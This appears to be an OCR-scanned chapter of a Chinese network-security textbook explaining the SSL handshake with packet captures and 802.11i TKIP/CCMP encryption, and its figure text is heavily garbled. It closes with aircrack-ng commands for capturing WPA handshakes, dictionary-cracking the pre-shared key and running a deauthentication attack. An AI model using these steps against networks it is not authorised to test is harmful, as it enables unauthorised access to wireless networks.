段 , 将 分 段 数据 进行 压缩 ,计算 MAC, 加 密 压 
缩 数据 和 MAC, 最 后 加 入 记录 头 部 。 接 收 方 
对 数据 进行 解密 、 验 证 ,解压 和 重组 ,最 后 提交 
给 上 层 应 用 程序 。 图 10-19 ”SSL 记录 协议 操作 过 程 
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10.3.2 SSL 握手 协议 
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SSL 握手 协议 是 SSL 中 最 复杂 的 协议 , 它 协商 的 结果 是 SSL 记录 协议 处 理 的 基础 ， 


它 的 内 容 分 为 三 部 分 : 数据 类 型 ( 表 10-3) .数据 长 度 (3 字 节 ) 和 数据 内 容 ( 与 类 型 有 关 的 
参数 )。 在 收发 双方 通信 之 前 ,首先 使 用 握手 协议 协商 各 种 参数 ,包括 协议 版 本 、 加 密 算 
法 、 相 关 密 钥 `.MAC 算法 ,然后 进行 身份 认证 ,最 后 客户 生成 一 个 随机 数 作 为 预 主 密 钥 ， 
用 服务 器 的 公 钥 加 密 后 ,发送 给 服务 器 。 此 后 ,所 有 的 数据 都 可 以 使 用 该 预 主 密 钥 按 照 密 
钥 交 换算 法 产生 会 话 密 钥 进行 加 密 , 保 证 安全 性 。 


表 10-3 ”握手 协议 的 数据 类 型 及 参数 





数据 类 型 


参数 





hello_request 


无 





client_hello 


版 本 号 ,随机 数 会话 ID 密码 参数 .压缩 方法 





server_hello 


























certificate X. 509 v3 证 书 链 
server_key_exchange 参数 ,签名 
certificate_request 类 型 ,CA 
server_done 无 
certificate_verify 待 验证 的 签名 
client_key_exchange 参数 ,签名 
finished 散 列 码 


SSL 握手 协议 过 程 如 图 10-20 所 示 ,虚线 表示 可 选 报 文 ,分 为 三 个 阶段 。 


























客户 client_hello 服务 器 
hello | server_hello 
certificate 
二 
上 Server_key_exchange 
窗 钥 交换 | | 
| server_hello_done 





certificate 


























| EE -| 
client_key_exchange | 
I | 
change_cipher_spec | 

finished - nished 

| change_cipher_spec 

1 finished 

| 
图 10-20 SSL 协议 握手 过 程 
1. hello 阶段 


主要 工作 是 协商 版 本 号 ,会话 ID 密码 组 .压缩 算法 和 交换 随机 数 等 。 
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(1) client_hello: 客户 初始 化 该 消息 ,将 客户 支持 的 建立 安全 通道 的 参数 发 送 给 服务 
器 进行 选择 。 

(2) server_hello: 服务 器 收 到 client_hello 后 可 以 回答 一 个 报警 报 文 表示 握手 失败 ， 
或 者 回答 server_hello, 将 服务 端 决定 选择 的 参数 组 合 传送 回 客户 ,其 中 包括 服务 器 产生 
的 新 随机 数 。 

2. 密 钥 协商 阶段 

主要 工作 是 发 送 服 务 器 证 书 , 请 求 客户 证 书 ( 可 选 ), 如 果 客 户 被 要 求证 书 , 则 发 送 。 

(1) certificate: 服务 器 发 送 自己 的 证 书 给 客户 ,表明 身份 。 客 户 检 查证 书 的 签名 
是 否 正确 有 效 , 从 而 获得 服务 器 的 公 钥 ,随后 可 以 使 用 该 公 钥 加 密 随机 产生 的 预 主 
密 钥 。 

(2) server_key_exchange: 当 hello 阶段 协商 的 算法 仅仅 使 用 certificate 的 信息 无 法 
进行 密 钥 交 换 时 ,使 用 该 报 文 发 送 密 钥 交换 所 必需 的 其 他 信息 。 

(3) server_hello_done: 服务 器 表明 server_hello 结束 ,等 待 客户 响应 。 

(4) client_key_exchange: 客户 用 服务 器 的 公 钥 加 密 一 个 随机 生成 的 预 主 密 钥 ,然后 
发 送 给 服务 器 ,服务 器 收 到 后 ,用 自己 的 私 钥 解 开 , 然 后 根据 hello 阶段 协商 的 算法 ,各 自 
计算 主 密 钥 , 最 后 产生 通信 使 用 的 会 话 密 钥 。 

3， finished 阶段 

主要 工作 是 改变 密码 组 ,完成 握手 。 

(1) 密码 规范 变更 报 文 : 表示 记录 协议 的 加 密 算法 和 认证 方式 的 改变 ,随后 将 启用 
新 的 密 钥 。 

(2) finished: 双方 互相 验证 收 到 的 finished 类 型 的 报 文 是 否 正确 无 误 ,从 而 确定 对 
方 已 经 生成 正确 的 会 话 密 钥 。 此 时 握手 协议 完成 ,双方 可 以 用 新 的 会 话 密 钥 安全 传输 
数据 。 

传输 层 安 全 协议 (Transport Security Layer,TLS) 与 SSL 之 间 的 差别 非常 小 ,但 是 使 
用 的 加 密 算法 存在 显著 差别 ,两 者 不 能 相互 操作 ,但 是 实际 的 应 用 程序 通常 都 同时 实现 了 
这 两 种 协议 。 著 名 的 开源 软件 OpenSSL 就 完全 实现 了 对 SSLv1、SSLv2、SSLv3 和 
TLSv1 的 支持 。 图 10-21 一 图 10-25 给 出 了 SSL 握手 过 程 报 文 示 例 , 它 基于 TLSvl 协议 
实现 。 由 图 10-21 可 以 看 出 ,客户 发 出 的 client_hello 消息 提供 了 26 组 参数 供 服务 器 选 
择 。 图 10-22 表明 服务 器 选择 了 RSA 公 钥 算法 、128 位 密 钥 的 AES CBC 模式 、 散 列 函数 
采用 SHA_256, 不 对 数据 进行 压缩 ,服务 器 为 这 次 通信 分 配 了 一 个 随机 会 话 人 D。 图 10-23 
表明 ,服务 器 随后 发 送 自 己 的 公 钥 证 书 , 提 供 密 钥 交 换 的 有 关 参 数 , 并 报告 server_hello_ 
done 消息 ,等 待 客户 响应 。 图 10-24 显示 客户 发 出 了 公 钥 加 密 的 预 主 密 钥 ,随后 发 送 密 
码 规范 变更 报 文 ,通知 服务 器 ,客户 已 经 准备 好 变更 加 密 方式 ,并 发 送 一 段 加 密 信息 
(finished 报 文 ) 提 供给 服务 器 进行 验证 。 图 10-25 显示 服务 器 同样 发 送 密 码 规范 变更 报 
文 , 通 知客 户 ,服务 器 已 经 准备 好 变更 加 密 方式 ,并 发 送 一 段 加 密 信息 (finished 报 文 ) 提 
供给 客户 验证 。 至 此 ,握手 完毕 。 
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上 Transmission control Protocol, src port: 50284 (50284), Dst Port: https (443), Sed 
日 secure sockers Layer 
日 TLSv1.2 Record Layer: Handshake Protocol: Client Hello 
Content Type: Handshake (22) 


Version: TLS 1.2 (0x0303) 
Length: 188 
日 Handshake Proroco1: client hello 

Handshake Type: client Hello (1) 
Length: 184 
Version: TLS 1.2 (0x0303) 协议 是 TLSv1 

日 Random 随机 数 
Session ID Length: 0 
cipher suites Length: 52 

加 Cipher suires (26 suires) 加 客 参 数组 合 . 26 种 
Compression Merhods Lengrh: 1 

加 Compression Merhods (1 method) 压缩 方法 
Extensions Length: 91 

@ Extension: server_name 

@ Extension: status_request 

Extension: elliptic_curves 

@ Extension: ec_point_formats 

Extension: signature_algorithms 

@ Extension: Unknown 23 

国 Extension: renegotiation info 














图 10-21 SSL client_hello 报 文 示例 


四 Frame 695: 1454 bytes on wire (11632 bits), 1454 bytes captured (11632 bits) on interface 0 
I Ethernet II, Src: 9c:21:6a:e4:79:8a (9c:21 79:8a), Dst: IntelCor_73:38:80 (74 73:30 
[a Internet protocol Version 4, Src: 61.129.7.39 (61.129.7.39), Dst: 192.168.2.201 (192.168.2.201)| 
In Transmission Control Protocol, Src Port: https (443), Dst Port: 50284 (50284), Seq: 1, Ack: 194| 
5 Secure Sockets Layer 

日 TLsv1.2 Record Layer: Handshake Protocol: server Hello 

Content Type: Handshake (22) 

TLS 1.2 (0x0303) 

Length: 93 
日 andshake Protocol: Server Hello 

Handshake Type: Server Hello (2) 











Length: 89 
Version: TLS 1.2 (0x0303) 
Random 


Session ID Length: 32 
Session ID: e16854dc09b183b7d4e5c91b80dbf54ae6f18b8a71b3fb23... 会 话 标记 
Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (Oxc027) 从 26 种 组 合 中 选 定 一 组 
compression Merhod: nu11 (0) 不 对 数据 压缩 
Extensions Length: 17 

困 Extension: server_name 

回 Extension: renegotiation_info 
Extension: er int formats 














图 10-22 ”SSL server_hello 报 文 示例 








Frane 653 I304 Bytes on wire (0432 6TESJ 1304 bytes captured (0432 DTESJ on 
田 Ethernet IT，Src: 9c:21: :Ba (9c:21;:6a: 9:8a), Dst: IntelCor_73:38:80 
四 Incernet Protocol Version Src: 61.129.7.39 (61.129.7.39), Dst: 192.168.2.201 
Transmission Control Protocol, Src Port: https (443), Dst Port: 50281 (50281), 

[3 Reassembled TCP Segments (3605 bytes): #648(1302), #651(1400), #653(903)] 


日 Secure Sockets Layer 
Er A rir | 
Content Type: Handshake (22) 
Version: TLS 1.2 (0x0303) 
Length: 3600 
Handshake Protocol: certificate 
Handshake Type: Certificate (11) 
Length: 3596 
Certificates Length: 3593 
Certificates (3593 bytes) 
© Secure Sockets Layer 
日 TLSv1.2 Record Layer: Handshake Protoco1: Server Key Exchange 
Content Type: Handshake (22) 
Version: TLS 1.2 (0x0303) 
Length: 333 
日 Handshake Protocol: server key Exchange 
Handshake Type: Server Key Exchange (12) 
Length: 329 


日 TLsv1.2 Record Layer: Handshake Protocol 
Content Type: Handshake (22) 
Version: TLS 1.2 (0x0303) 
Length: 4 
日 Handshake Protocol: server Hello Done 


Handshake Type: Server Hello Done (14) 
renarh. 0 


















图 10-23 SSL 服务 端 certificate 报 文 示例 
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EFrane 714: 220 bytes on wire (1760 bits), 220 bytes captured (1760 bits) on TFT 
BB Ethernet II, Src: Intelcor_73:38:80 (74:e5:0b:73:38:80), Dst: 9c:21:6a:e4:79:8a ( 
BB Inrerner Prorocol version 4, src: 192.168.2.201 (192.168.2.201), Dst: 61.129.7.39 
Bh Transmission control Prorocol, Src Port: 50284 (50284), Dst Port: https (443), Seq| 
BEB secure Layer 
TLSv1.2 Record Layer: Handshake Prorocoi [Eere ey exeraroe] 
Content Type: Handshake (22) 
Version: TLS 1.2 (0x0303) 
Length: 70 
日 Handshake Protocol: clienr key Exchange 
Handshake Type: Client Key Exchange (16) 
Length: 66 
日 EC Diffie-Hellman Client Params 
Pubkey Length: 65 公 钥 加 刻 预 主 密 钥 
pubkey: 04f5b8d5b67ad76f3af16a1621938094dd1a529a3755e437.. 
nsa.? recurd Layer: Change cipher spec Protocol: 
Content Type: change Cipher spec (20) 
Version: TLS 1.2 (0x0303) 
Length: 1 





Change Cipher spec Message 密码 规范 变更 
nsa2 Record Layer: Handshake Protocol: Encrypted Handshake Message 
nt Type: Handshake (22) 
pu TLS 1.2 (0x0303) 
Length: 80 
Handshake protocol: Encrypted Handshake Message 


图 10-24 SSL 客户 密 钥 交换 报 文 示例 














四 Frame 667: 145 bytes on wire (1160 bits), 145 bytes captured (1160 bits) on interface 0 
m Ethernet IT，src: es (9c:21:6a:e4:79:8a), Dst: IntelCor_73:38:80 (74: a 
a Internet protocol Version 4, Src: 61.129.7.39 (61.129.7.39), Dst: 192.168.2.201 (192. 01) 
a Transmission Control oe Src Port: https (443), DSt Port: 50281 (50281), Seq: 4051, ks 
日 secure sockers 上 
B TLSV1.2 Record Layer: Change Cipher Spec Protocol: change cipher Spec 
Content Type: change Cipher spec (20) 
Version: TLS 1.2 (0x0303) 
Length: 1 
change cipher spec Message 
B TLSV1.2 Record Layer: Handshake Protocol: Encrypred Handshake Message 
Content Type: Handshake (22) 
Version: TLS 1.2 (0x0303) 
Length: 80 
Handshake Protocol: Encrypred Handshake Message 


图 10-25 SSL 服务 器 密码 规范 变更 报 文 示例 














10.3.3 ”SSL 协议 的 安全 性 


握手 协议 的 安全 性 是 SSL 协议 安全 性 的 基础 ,在 握手 协议 中 产生 主 密 钥 , 将 主 密 钥 
用 密 钥 导出 函数 处 理 , 从 而 产生 会 话 密 钥 。 而 主 密 钥 由 预 主 密 钥 、 客 户 随机 数 和 服务 器 随 
机 数 生成 ,只 要 攻击 者 获得 预 主 密 钥 , 就 能 计算 出 SSL 的 会 话 密 钥 ,因此 SSL 的 安全 性 基 
于 预 主 密 钥 的 安全 性 ,而 预 主 密 钥 的 安全 性 取决 于 随机 数 的 生成 质量 。 

如 果 服 务 器 的 私 钥 被 窃取 ,攻击 者 就 可 以 冒充 服务 器 与 客户 进行 握手 , 即 SSL 可 能 
遭受 MITM 攻击 。 基 于 特征 的 IPS 系统 通常 无 法 检测 基于 SSL 的 攻击 ,因为 通信 报 文 
都 已 经 被 加 密 。 由 于 SSL 使 用 复杂 的 数学 公式 进行 加 /解密 操作 ,高 强度 的 计算 会 降低 
服务 器 的 性 能 和 吞吐 量 。SSL 不 保证 浏览 器 和 服务 器 自身 的 安全 , 它 仅 保证 传输 数据 的 
安全 性 。 


10.4 802. 11i 
传统 的 WLAN 安全 协议 WEP(CWire Equivalent Protocol) 在 加 密 和 认证 机 制 上 存在 


大 缺陷 ,使 得 WLAN 无 法 满足 数据 通信 的 安全 要 求 ,802. 11i 应 运 而 生 , 解 决 了 这 个 
题 。 


[En 





可 | 
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10.4.1 加 密 机 制 


加 密 机 制 用 于 实现 WLAN 中 数据 传输 的 保密 性 和 完整 性 ,目前 802. 11i 有 两 种 机 
制 , 分 别 是 临时 密 钥 完整 性 协议 (Temporary Key Integrity Protocol, TKIP) 和 CCMP 
(CTR with CBC-MAC Protocol) 。 

1. TKIP 

WEP 协议 加 密 机 制 (图 10-26) 的 缺陷 主要 有 以 下 几 条 : 

(1) 静态 配置 密 钥 ; 

(2) 属于 相同 BSS 的 所 有 终端 共享 只 有 2* 个 密 钥 的 一 次 性 密 钥 空 间 ; 

(3) 完整 性 检测 机 制 依赖 CRC 校 验 算法 ,不 可 靠 。 
















































































密 文 检测 错误 

















攻 糯 | EE 相等 ， 完 整 性 
| 5 角 检测 正确 
NT | 一 lt .| | | -| - 
WEP 生成 器 wv ml 异 或 | 。| 数 据 
窗 钥 异 或 操作 

数据 操作 密 文 校 验 一 一 

| 和 不 等 ， 完 整 性 
| CRC 校 验 和 
数据 

















图 10-26 WEP 加 /解密 过 程 


因此 ,TKIP 一 方面 尽量 与 WEP 加 密 机 制 兼容 以 达到 快速 更 新 WLAN 设备 的 安全 
机 制 , 另 一 方面 必须 消除 WEP 的 安全 缺陷 。TKIP 与 WEP 的 不 同 之 处 在 于 以 下 几 个 
方面 : 

(1) 临时 密 钥 (Temporary Key,TK) 是 基于 用 户 分 配 ,而 不 是 基于 MAC; 

(2) TK 在 终端 与 AP 建立 安全 关联 SA 时 产生 ,在 SA 失效 后 会 删除 , 即 每 次 建立 
SA 时 都 会 产生 不 同 的 TK ,这 里 的 SA 是 指 建立 安全 交换 数据 的 关联 ,与 IPSec SA 不同; 

(3) TKIP 用 48 位 的 序号 计数 器 (TKIP Sequence Counter,TSC) 取 代 WEP 的 24 位 
初始 向 量 IV, 因 此 一 次 性 密 钥 空 间 增长 为 2*, 由 于 发 送 方 的 MAC 也 参与 一 次 性 密 钥 的 
生成 ,保证 在 任何 安全 关联 存在 期 间 每 个 终端 都 不 会 有 一 次 性 密 钥 重复 的 问题 ,而 且 也 可 
以 防止 重 放 攻 击 。 

TKIP 采用 Michael 算法 计算 消息 完整 性 编码 (Message Integrity Code, MIC), 与 
HMAC 算法 类 似 , 但 是 相对 简单 一 些 , 它 对 数据 执行 基于 MIC 密 钥 的 散 列 计算 ,产生 8 
字 节 的 MIC, 用 于 保证 完整 性 ,攻击 者 无 法 同时 算 改 数据 序列 和 MIC 使 得 完整 性 检查 失 
效 。 图 10-27 给 出 TKIP 的 加 密 和 解密 过 程 : 

(1) 48 位 的 TSC 值 初始 为 1, 每 发 送 一 帧 ,该 值 加 1。 

(2) TSC 被 分 成 高 32 位 和 低 16 位 ,高 32 位 和 128 位 的 临时 密 钥 TK、48 位 的 发 送 
端 MAC 作为 1 级 密 钥 混合 函数 的 输入 ,产生 80 位 的 中 间 密 钥 TTAK。 

(3) TTAK、TK 和 TSC 的 低 16 位 作为 2 级 密 钥 混合 函数 的 输入 ,用 于 产生 128 位 
的 一 次 性 密 钥 。 

两 个 密 钥 混合 函数 的 功能 与 伪 随 机 数 生成 器 类 似 , 一 是 无 法 通过 输出 推导 输入 ,二 是 
输入 的 改变 会 尽量 改变 输出 。 将 一 次 性 密 钥 的 生成 过 程 分 为 两 级 是 既 要 增加 用 于 加 密 每 
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32 位 “| 16 位 MIC 窗 钥 
WEP WEP 
-| 公主 | 一、 密 钥 密 钥 
TA ~ 上 Ts 二 -| |! 级 密 | TTAk |2 弘 密 
一 | 函数 一 | 隙 数 [| TA 骨 混 全 一 一 一角 混 创 一 | 相等， 完整 
IK WEP| 。 一 | 本数 | 一 一 | 画 数 | IV 明文 Michacl 性 检测 正确 
加 密 文 Irsc 低 16 位 WEP 拼装 [一 一 | 算法 
解密 
SA,DA 窗 : MIC| 
和 数据 es 明文 TSC 高 32 位 密 广 [一 一 | 不 等 , 完整 
一 |Michael| MIC 等 ， 完 
一 对 亲 | 人 机 错误 
MIC 密 钥 TSC™ 


























图 10-27 TKIP 的 加 /解密 过 程 


一 帧 的 一 次 性 密 钥 空间 ,又 要 尽 可 能 减少 计算 复杂 度 。 对 于 两 级 计算 过 程 ,在 TSC 的 高 
32 位 不 变 时 ,中 间 密 钥 TTAK 不 变 , 即 每 发 送 25 帧 , 才 需要 重新 计算 一 次 TTAK。 由 于 
每 帧 的 TSC 值 都 不 同 ,因此 每 一 帧 的 一 次 性 密 钥 也 不 同 。 

(4) MAC 帧 的 源 和 目标 MAC 地 址 以 及 数据 作为 Michael 算法 的 输入 ,再 基于 MIC 
密 钥 计算 散 列 码 。 

(5) 将 一 次 性 密 钥 作为 伪 随 机 数 种 子 , 应 用 WEP 算法 产生 与 待 加 密 数据 长 度 相同 的 
随机 密 钥 长 度 , 将 随机 密 钥 与 数据 异 或 生成 密 文 。 

收发 双方 安全 交换 数据 的 前 提 是 拥有 相同 的 临时 密 钥 TK ,接收 方 收 到 MAC 时 ,从 
其 中 分 离 出 目标 MAC 地 址 和 TSC, 根 据 MAC 地 址 找到 对 应 的 TK ,然后 依据 同样 方式 
计算 出 一 次 性 密 钥 和 随机 密 钥 ,将 数据 异 或 解密 后 ,重新 计算 MIC 散 列 码 ,并 与 收 到 的 散 
列 码 比 较 , 如 果 相 同 则 数据 没有 被 自 改 。 由 于 MIC 的 输入 包括 了 源 和 目标 MAC 地 址 ， 
因此 源 地 址 欺骗 攻击 也 难以 实现 。 

2. CCMP 

TKIP 和 WEP 本 质 上 属于 流 加 密 , 因 为 它们 的 加 密 算法 只 是 异 或 操作 ,因此 安全 性 
完全 依赖 于 一 次 性 密 钥 的 空间 大 小 和 密 钥 不 重复 .TKIP 的 密 钥 空间 是 2s。 另 外 ,TKIP 
的 一 次 性 密 钥 与 伪 随 机 数 种 子 一 一 对 应 ,攻击 者 有 可 能 根据 截获 到 的 一 次 性 密 钥 推导 出 
WEP 密 钥 和 临时 密 钥 TK ,从 而 攻破 TKIP 的 安全 机 制 。 

CCMP(Counter-Mode/CBC-MAC Protocol) 的 工作 过 程 如 图 10-28 所 示 。 

















































































































TK 密 钥 MAC 头 部 | CCMP 头 部 密 文 数据 MIC | FCS 
报 文 攻 -天 
优先 级 开 标识 符 文 编号 优先 级 
MAC 关 部 | 明文 数据 法 编 5 了 二 
- 源 MAC 地 址 
完整 性 字段 | WW MAC | 完整 性 1 | | 
1 | 了 [WE 随机 数 
附加 认证 数据 随机 数 CCMP 首 部 T 1 
1 1 
a CCMP 解 密 和 完整 性 检测 算法 
f 1 MAC 头 部 | 明文 数据 和 二 人 
MAC 头 部 | CCMP 头 部 | 。 密 文 数据 “| MIC | Fcs 村 























图 10-28 CCMP 加 密 和 解密 过 程 
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(1) 首先 将 MAC 帧 头 部 中 需要 在 传输 过 程 中 保证 完整 性 的 字段 作为 附加 认证 数 
据 , 包 括 地 址 字段 .控制 字段 和 其 他 在 传输 时 应 该 保持 不 变 的 字段 。 

(2) 将 6 字 节 的 源 MAC 地 址 (SA)、6 字 节 的 报 文 编号 (PN) 和 1 字 节 的 固定 为 0 的 
优先 级 字段 组 成 13 字 节 的 随机 数 ,保证 用 不 同 的 密 钥 流 加 密 不 同 的 帧 ,同时 也 可 以 防止 
重 放 攻 击 ,这 里 PN 与 TKIP 的 TSC 功能 类 似 。 

(3) CCMP 采用 AES 算法 加 密 , 采 用 128 比特 的 临时 密 钥 TK。 

分 组 加 密 体 制 的 好 处 在 于 算法 的 复杂 性 ,即使 截获 到 多 组 密 文 和 对 应 明文 后 ,也 无 法 
推导 出 密 钥 。 因 此 密 钥 的 安全 性 要 好 于 TKIP, 但 是 算法 的 复杂 性 要 高 于 TKIP 的 伪 随 
机 数 生成 算法 。 

CCMP 使 用 AES 算法 来 实现 MIC 散 列 , 如 图 10-29 所 示 , 其 中 1 字 节 的 标志 字段 给 
出 有 关 MIC 长 度 和 随机 数 长 度 的 信息 , 它 将 数据 分 成 长 度 为 128 比特 的 分 组 ,然后 对 它 
们 进行 CBC 模式 的 加 密 运 算 , 计 算出 8 字 节 的 工 值 ,作为 MIC 的 重要 组 成 部 分 。 

1B 13B 22~30B 
标志 字 节 | 随机 数 | 附加 认证 数据 数据 



























































7Z( 取 8B) 
图 10-29 MIC 算 法 


CCMP 的 加 密 算法 如 图 10-30 所 示 。 

(1) 由 1 字 节 的 标志 字段 ,2 字 节 的 计数 器 和 13 字 节 随机 数 构成 一 个 128 比特 的 数 
据 块 。 

(2) 使 用 临时 密 钥 TK 作为 密 钥 ,对 从 计数 器 为 0 开始 的 N 十 1 个 数据 块 分 别 进行 
AES 加 密 , 产 生 加 密 序列 So ,Si ,… ,Sw。 

(3) Si1,S;,… ,Sw 拼接 在 一 起 作为 与 明文 数据 相同 长 度 的 密 钥 流 , 与 明文 数据 异 或 运 
算 生成 密 文 。 

(4) So 的 高 64 位 与 工 值 异 或 ,产生 最 终 的 MIC 值 。 

由 于 AES 的 安全 性 远 远 高 于 伪 随 机 数 生 成 算法 ,因此 CCMP 的 加 密 算法 和 完整 性 
检测 算法 的 安全 性 均 高 于 TKIP, 当 然 , 计 算 复杂 度 也 远 远 高 于 TKIP, 因 此 需要 在 计算 复 
杂 性 和 安全 性 之 间 进 行 权 衡 。 


10.4.2 安全 关联 
无 线 主机 接 人 AP 的 过 程 是 一 个 建立 关联 的 过 程 ( 图 10-31) ,类 似 于 将 主机 连接 到 
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1B 13B 2B 1B 13B 2B 1B 13B 2B 
标志 字 节 | 随机 数 | 计数 器 0 | 标志 字 节 | 随机 数 | 计数 器 1 | … | 标志 字 节 | 随机 数 | 计数 器 Y 
TK TK | TK 
(128b) (128b) (128b) 并 
一 AES — AES — AES 
8B 
Is [Bd 
MS 拼接 各 分 组 
7(8B) 
密 文 数据 
明文 数据 








图 10-30 CCMP 数据 加 密 算法 


LAN 中 的 交换 机 端口 。 一 旦 建立 关联 ,主机 就 完成 了 接 入 WLAN 的 过 程 。 在 LAN 中 ， 
用 户 认证 通过 802. 1X 基于 端口 进行 ,与 此 类 似 ,在 802. 11i 下 ,AP 和 主机 之 间 的 关联 是 
受 控 的 , 接 入 用 户 必 须 经 过 认证 后 ,关联 才能 从 非 认 证 状态 转 为 认证 状态 ,主机 才 可 以 通 
过 AP 转发 数据 。 另 外 ,802. 11i 的 认证 基于 用 户 而 不 是 基于 主机 ,并 且 每 次 会 话 使 用 的 
密 钥 都 不 同 , 这 也 是 TK 的 含义 。 因 此 ,802. 11i 在 用 户 通过 身份 认证 后 为 用 户 分 配 TK， 
这 种 经 过 身份 认证 并 动态 分 配 临时 密 钥 的 关联 称 为 安全 关联 。 临 时 密 钥 只 在 安全 关联 存 
在 期 间 有 效 , 一 旦 安全 关联 分 离 或 重新 建立 安全 关联 ,必须 重新 分 配 临 时 密 钥 TK 。 

802. 11i 的 安全 关联 过 程 分 为 认证 过 程 和 密 钥 分 配 过 程 。802. 11i 同样 使 用 802. 1X 
和 EAP 进行 认证 ,但 是 与 LAN 不 同 之 处 在 于 ,为 了 保证 安全 ,用 户 也 需要 认证 AP 的 身 
份 ,因此 它 是 一 个 双向 身份 认证 的 过 程 。 

当 认 证 结束 后 ,双方 具有 相同 的 预 主 密 钥 (Pairwise Master Key,PMK) ,该 密 钥 可 以 
是 双方 预 共享 的 密 钥 , 也 可 以 是 双方 在 认证 过 程 中 产生 的 对 称 密 钥 ,主机 和 AP 之 间 开 始 
如 图 10-32 所 示 的 密 钥 分 配 过 程 。 





探测 请 求 主机 (9) 
探测 响应 ~ 
a (9) 
认证 请 求 (开放 系 张 CN 
\、 Rs EAPOL-KEY(AN) 
CY 认证 响应 (成 功 ) | 
EAPOK-KEY(SN.MIC) 
关联 请 求 | 
= 让 加 A EAPOL-KEY(AN.MIC, 
关联 响应 EEk(GTK)) 











EAPOL-KEY(MIC) 
802.1X 接 入 控制 过 程 


10-31 关联 建立 过 程 图 10-32 ”802. 1X 密 钥 分 配 过 程 
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(1) 主机 收 到 AP 传输 的 随机 数 AN 后 ,自己 也 生成 一 个 随机 数 SN ,然后 基于 双方 
的 MAC 地 址 .AN、SN、PMK, 生 成 成 对 过 渡 密 钥 (Pairwise Transient Key,PTK) ,PTK 
(图 10-33) 只 用 于 和 该 关联 有 关 的 AP 和 主机 。 


PMK 
AP 地 址 AN | (256b) | SN 主机 地 址 


伪 随 机 数 生成 器 

















TKIP PTK(512b) CCMP PTK(384b) 
CK(128b)| EK(128b)| TK(128b)|MIC(12gbj 。 | CKC128b)| EK(128b)| TK(128b) 




















图 10-33 802. 11i PTK 结构 


(2) PTK 中 包含 两 个 密 钥 ,分 别 是 证 实 密 钥 (Confirmation Key, CK) 和 加 密 密 钥 
(Encryption Key,EK)。CK 用 于 对 双方 进行 的 密 钥 产生 过 程 进行 证 实 ,EK 用 于 加 密 整 
个 密 钥 产生 过 程 中 传输 的 信息 。 

另外 ,TKIP 和 CCMP 生成 的 PTK 有 所 不 同 ,因为 TKIP 用 于 加 密 和 完整 性 检测 的 
两 个 密 钥 不 同 ,而 CCMP 使 用 一 个 密 钥 同时 进行 加 密 和 完整 性 检测 ; TKIP 的 PTK 长 度 
为 512 位 ,而 CCMP 的 PTK 长 度 为 384 位 ; TKIP 的 PTK 中 包括 TK 和 MIC 密 钥 , 而 
CCMP 的 PTK 中 仅 包 含 TK。 

(3) 主机 生成 密 钥 后 ,向 AP 发 送 随机 数 SN, 以 及 由 CK 加 密 的 帧 的 散 列 码 MIC, 用 
于 证 实 主机 的 密 钥 生 成 过 程 。 

(4) AP 收 到 SN 后 ,使 用 与 主机 相同 的 方式 产生 PTK ,然后 生成 相同 的 MIC 与 主机 
发 送 的 散 列 码 进行 比较 ,证 实 主机 的 密 钥 生成 过 程 的 正确 性 。 

(5) AP 再 次 发 送 SN 由 CK 加 密 的 帧 的 散 列 码 MIC, 以 及 由 EK 加 密 的 临时 组 播 密 
钥 (Group Temporal Key,GTK) ,让 主机 证 实 AP 的 密 钥 产生 过 程 ; GTK 是 用 于 AP 向 
BSS 中 终端 广播 的 密 钥 。 


10.4.3 无 线 破解 


个 人 主机 通过 无 线 AP 上 网 通常 采用 WPA/PSK 或 WPA2/PSK 方式 ,WPA 的 全 称 
是 Wi-Fi Protected Access,PSK 指 Pre-Shared Key, 即 主机 和 AP 预先 共享 相同 的 密 钥 。 
WPA 使 用 的 协议 是 TKIP, 而 WPA2 使 用 的 是 CCMP。 

通常 所 说 的 无 线 破解 并 不 是 指 攻击 TKIP 或 者 CCMP 协议 ,而 是 通过 抓 取 图 10-32 
的 密 钥 分 配 过 程 的 前 两 个 报 文 , 得 到 AN SN 后 ,结合 AP 和 主机 的 MAC 地 址 ,对 预 共 享 
的 主 密 钥 进行 穷 举 攻击 ,生成 不 同 的 PTK ,然后 与 MIC 值 进行 匹配 ,匹配 成 功 表 明 搜 索 
到 正确 的 PSK。 

无 线 破解 的 经 典 工具 是 aircrack-ng, 它 是 跨 平台 工具 ,主要 用 于 WEP、WPA/PSK 和 
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WPA2/PSK 密 钥 破解 。 它 包括 不 少 辅助 工具 ,如 表 10-4 所 列 。 只 要 airodump-ng 收集 
到 足够 数量 的 报 文 ,aircrack-ng 就 可 以 自动 检测 报 文 并 判断 是 否 可 以 破解 。 


表 10-4 ”aircrack-ng 主要 工具 集合 























工 具 作 用 
aircrack-ng 根据 捕获 的 报 文 进行 口令 破解 
airmon-ng 改变 无 线 网 卡 工作 模式 ,以 便 其 他 工具 的 顺利 使 用 
airodump-ng 捕获 802. 11i 数据 报 文 ,以便 aircrack-ng 破解 
aireplay-ng 重 放 攻 击 , 可 以 解除 关联 过 程 ,以 便 airodump-ng 抓 取 密 钥 分 配 报 文 
airolib-ng 使 用 彩虹 表 文件 进行 破解 时 ,用 于 建立 特定 数据 库 文件 








以 Linux 为 例 ,aircrack-ng 破解 的 主要 流程 如 下 

(1) 激活 无 线 网 卡 的 报 文 捕获 功能 ,使 用 airmon-ng 工具 来 实现 : 

airmon- ng check kill]  // 结 束 可 能 与 报 文 捕获 有 冲突 的 进程 

airmon 一 ng start wlan0  //wlan0 为 无 线 网 卡 名 字 , 通 常会 生成 一 个 称 为 四 an0mon 的 监视 网 卡 

(2) 开始 捕获 报 文 , 首 先 获 得 AP 的 ESSID 号 .BSSID( 即 MAC 地 址 )、 信 和 道 号 等 信 
息 ,然后 针对 具体 的 AP 进行 捕获 ; 

airodump - ng wlanOmon 

// 捕 获 指定 a 的 报 文 ,格式 为 标准 的 pcap 格式 


airodump- ng -- essid AP 的 ESSID -- channel 信道 号 -- output - format pcap -ww 输出 的 文件 
名 waln0mon 


(3) 字典 破解 : 

aircrack- ng -ww 字典 报 文 文件 

有 时 可 能 等 待 很 久 也 无 法 捕获 密 钥 分 配 报 文 ,因为 用 户 一 直 在 线 。 此 时 攻击 者 可 以 
使 用 aireplay-ng 进行 重 放 攻击 ,强制 用 户 退 出 关联 并 重新 连接 ( 称 为 Deauth 攻击 ) ,迅速 
捕获 到 相关 报 文 , 相 关 命 令 如 下 : 


aireplay-ng -0N -aAP 地 址 -ec 主机 地 址 wlan0mon // -0N 表 示 发 送 个 重 放 报 文 , 可 以 
// 是 1 一 64 


10.5 小 结 


